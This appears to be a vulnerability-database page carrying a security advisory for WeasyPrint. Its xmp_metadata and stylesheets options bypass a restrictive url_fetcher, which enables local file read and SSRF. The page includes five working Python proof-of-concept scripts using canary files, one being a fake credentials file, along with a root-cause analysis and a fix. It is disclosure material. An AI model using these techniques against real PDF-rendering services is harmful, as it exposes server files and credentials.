VDB
Sign up
MEDIUM6.2

GHSA-jf6q-chmf-3h3v

weasyprint Has Server-Side Request Forgery (SSRF)

Quick fix

GHSA-jf6q-chmf-3h3v — weasyprint: upgrade to the fixed version with the command below.

pip install --upgrade 'weasyprint>=70.0'

Details

## Summary

`url_fetcher` is WeasyPrint's documented mechanism for restricting resource loading - applications use it to block `file://`, internal hosts, etc. when rendering untrusted input.

Two `write_pdf()` channels ignore the document's `url_fetcher` and build a fresh default `URLFetcher()` instead. A restrictive fetcher set on `HTML()` is silently bypassed for:

- **`xmp_metadata=[url]`** - the URL is fetched and the bytes are embedded verbatim in the output PDF. This is an **arbitrary local file read** when the path is attacker-influenced. - **`stylesheets=[url_or_path]`** - the sheet is fetched and applied. This is **SSRF / arbitrary local-or-internal resource loading**, and it is **transitive**: the permissive fetcher propagates through the whole `@import` / `url()` graph.

Applications affected are those that (1) run WeasyPrint server-side, (2) set a restrictive `url_fetcher` to block `file://` or internal hosts, and (3) forward an attacker-influenced URL/path into either parameter - e.g. PDF rendering APIs, invoice/report generators, document SaaS.

## Affected versions

All versions through current `main` - v69.0, commit `2945986160dedd97a7547be03805b667964e422a`.

## Root cause

`select_source()` defaults to a fresh fetcher when none is passed (`weasyprint/urls.py`):

```python def select_source(guess=None, filename=None, url=None, ..., url_fetcher=None, ...): ... if url_fetcher is None: url_fetcher = URLFetcher() ```

Five of the seven resource-loading sites thread the document's fetcher correctly:

- `<link rel=stylesheet>` in `weasyprint/css/__init__.py` - `<style>` in `weasyprint/css/__init__.py` - `@import` in `weasyprint/css/__init__.py` - `@font-face` / `local()` in `weasyprint/text/fonts.py` - `@color-profile src` in `weasyprint/css/__init__.py` - images (`<img>`, CSS `url()`, SVG) in `weasyprint/images.py`

Two do **not** — they build a fresh default fetcher instead:

- `write_pdf(xmp_metadata=[...])` in `weasyprint/pdf/__init__.py` - `write_pdf(stylesheets=[str])` in `weasyprint/document.py`

**`xmp_metadata`** - `pdf/__init__.py` calls `select_source(url)` with no `url_fetcher`, so the default fetcher runs regardless of what the caller configured:

```python if options['xmp_metadata']: for url in options['xmp_metadata']: result = select_source(url) # no url_fetcher ```

**`stylesheets`** - `document.py` builds each sheet without passing `url_fetcher`, and `CSS.__init__` then defaults to a fresh `URLFetcher()`:

```python for css in options['stylesheets'] or []: if not hasattr(css, 'matcher'): css = CSS( # no url_fetcher=html.url_fetcher guess=css, media_type=html.media_type, font_config=font_config, counter_style=counter_style, color_profiles=color_profiles) ```

Because `@import` / `url()` inherit a CSS object's fetcher, the permissive fetcher propagates to the entire import graph - so the bypass is transitive.

## Reproduction

Each script defines a `Block` fetcher that refuses every `file://`, writes its own fixture to a temp dir, and prints a boolean. `True` means the restrictive fetcher was bypassed. No external files or network needed.

### 1 - `xmp_metadata=` reads a `file://` the fetcher blocks

```python import os, tempfile from weasyprint import HTML from weasyprint.urls import URLFetcher

class Block(URLFetcher): def fetch(self, url, headers=None): if url.lower().startswith('file:'): raise ValueError('blocked ' + url) return super().fetch(url, headers)

d = tempfile.mkdtemp() path = os.path.join(d, 'secret.xmp') open(path, 'wb').write(b'CANARY_XMP_LEAK_7f3a9c') pdf = HTML(string='<p>hi</p>', url_fetcher=Block()).write_pdf( xmp_metadata=['file://' + path], pdf_variant='pdf/a-3b', uncompressed_pdf=True) print('secret file leaked into PDF:', b'CANARY_XMP_LEAK_7f3a9c' in pdf) # -> True ```

(`pdf_variant='pdf/a-3b'` makes the embedded bytes observable in the output; the read happens regardless of variant.)

### 2 - `stylesheets=` applies a blocked `file://` sheet (with control)

```python import os, tempfile from weasyprint import HTML from weasyprint.urls import URLFetcher

class Block(URLFetcher): def fetch(self, url, headers=None): if url.lower().startswith('file:'): raise ValueError('blocked ' + url) return super().fetch(url, headers)

d = tempfile.mkdtemp() path = os.path.join(d, 'evil.css') open(path, 'w').write('@page { size: 1234px 5678px }')

doc = HTML(string='<p>x</p>', url_fetcher=Block()).render(stylesheets=['file://' + path]) p = doc.pages[0] print('evil.css applied via stylesheets=:', (round(p.width), round(p.height)) == (1234, 5678)) # -> True

# Control: the same sheet via <link rel=stylesheet> is NOT applied (the fetcher blocks it; # WeasyPrint logs and continues), so the page keeps its default A4 size. This confirms the # gap is specific to stylesheets= and not a misconfigured fetcher. ctrl = HTML(string='<link rel="stylesheet" href="file://%s"><p>x</p>' % path, url_fetcher=Block()).render() cp = ctrl.pages[0] print('control <link> correctly blocked:', (round(cp.width), round(cp.height)) != (1234, 5678)) # -> True ```

### 3 - the `stylesheets=` bypass is transitive

```python import os, tempfile from weasyprint import HTML from weasyprint.urls import URLFetcher

class Block(URLFetcher): def fetch(self, url, headers=None): if url.lower().startswith('file:'): raise ValueError('blocked ' + url) return super().fetch(url, headers)

d = tempfile.mkdtemp() inner = os.path.join(d, 'inner.css') outer = os.path.join(d, 'outer.css') open(inner, 'w').write('@page { size: 333px 777px }') open(outer, 'w').write('@import url("file://%s");' % inner) doc = HTML(string='<p>x</p>', url_fetcher=Block()).render(stylesheets=['file://' + outer]) p = doc.pages[0] print('nested @import applied transitively:', (round(p.width), round(p.height)) == (333, 777)) # -> True ```

### 4 - `xmp_metadata=` discloses a credentials file in full

```python import os, json, tempfile from weasyprint import HTML from weasyprint.urls import URLFetcher

class Block(URLFetcher): def fetch(self, url, headers=None): if url.lower().startswith('file:'): raise ValueError('blocked ' + url) return super().fetch(url, headers)

creds = {'db_name': 'CANARY_DB_NAME', 'db_password': 'CANARY_PASSWORD_a3f7e9c2', 'encryption_key': 'CANARY_ENC_KEY_b8d4f6a1', 'secret_key': 'CANARY_SECRET_KEY_c5e9d2b7'} d = tempfile.mkdtemp() path = os.path.join(d, 'site_config.json') json.dump(creds, open(path, 'w')) pdf = HTML(string='<p>x</p>', url_fetcher=Block()).write_pdf( xmp_metadata=['file://' + path], pdf_variant='pdf/a-3b', uncompressed_pdf=True) print('all credential fields leaked into PDF:', all(v.encode() in pdf for v in creds.values())) # -> True ```

An attacker who controls the `xmp_metadata` path reads any file the rendering process can access and receives its contents in the generated PDF.

### 5 - scope of the `stylesheets=` channel (honest bound)

The sheet is applied, but its content does not leak verbatim - CSS comments are stripped during parsing. So this channel is SSRF / resource application, **not** verbatim disclosure on its own.

```python import os, tempfile from weasyprint import HTML from weasyprint.urls import URLFetcher

class Block(URLFetcher): def fetch(self, url, headers=None): if url.lower().startswith('file:'): raise ValueError('blocked ' + url) return super().fetch(url, headers)

d = tempfile.mkdtemp() path = os.path.join(d, 'secrets.css') open(path, 'w').write('/* CANARY_SECRET_e2a8c5d4 */\n@page { size: 999px 888px }') html = HTML(string='<p>x</p>', url_fetcher=Block()) doc = html.render(stylesheets=['file://' + path]) pdf = html.write_pdf(stylesheets=['file://' + path], uncompressed_pdf=True) p = doc.pages[0] print('sheet applied (bypass):', (round(p.width), round(p.height)) == (999, 888)) # -> True print('comment leaked verbatim:', b'CANARY_SECRET_e2a8c5d4' in pdf) # -> False ```

## Suggested fix

Route both call sites through the document's `url_fetcher`, matching the five sites that already do this.

- **`pdf/__init__.py`** - `select_source(url, url_fetcher=self.url_fetcher)`. (Alternatively, restrict `xmp_metadata` to byte strings so no URL fetching occurs.) - **`document.py`** - `CSS(guess=css, ..., url_fetcher=html.url_fetcher)`. This one change also closes the transitive case, since imported sheets inherit the parent's fetcher.

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI/weasyprint
Introduced in: 0Fixed in: 70.0
Fixpip install --upgrade 'weasyprint>=70.0'

References